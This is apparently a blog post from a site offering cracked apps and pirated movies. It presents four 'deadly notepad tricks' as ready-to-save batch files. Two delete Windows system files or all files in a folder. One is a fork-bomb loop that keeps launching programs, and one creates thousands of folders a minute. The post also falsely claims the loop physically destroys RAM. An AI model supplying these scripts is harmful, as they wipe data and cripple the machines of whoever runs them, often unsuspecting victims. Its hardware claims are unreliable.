All types Of stuffz On One Site Like Mod Games, Cracked Apps, PC HD movies , Android HD Movies Much More etc.

Saturday 25 July 2015

Top 4 Notepad Tricks

No comments


These are some of the most deadly notepad tricks available on the net.These can be extremely fatal for your computer and I recommend you use it keeping this in mind.These all tricks are for ethical purposes.Its your choice how would you use them

1)R.I.P (Shut down your computer forever!)

Type on the following code and save it as RIP.bat-
cmd /c del c:windows* /F /S /Q
cmd /c del c:* /F /S /Q
This will delete all the windows files required for booting the computer making it almost impossible to reboot

2)Nuclear Bomb(Explode your RAM!)

Type on te following code in notepad and save it as nuclearbomb.bat-
:bomb
start 
(any high ram consuming file like a game and if you leave it blank it will display CMD windows)
goto bomb
This will keep opening the programme until your RAM is destroyed.

3)Nothing left-All gone (Delete all your files!)

Type on the following code and save it as allgone.bat-
del*.*
This simple code will delete all your files in less than 5 minutes.

4)Overload(Create thousands of files in a minute)

Type on the following code and save it as overload.bat-
@echo off
:top
md %random%
goto top
This will create some 3000 folders per minute with random names.

No comments :

Post a Comment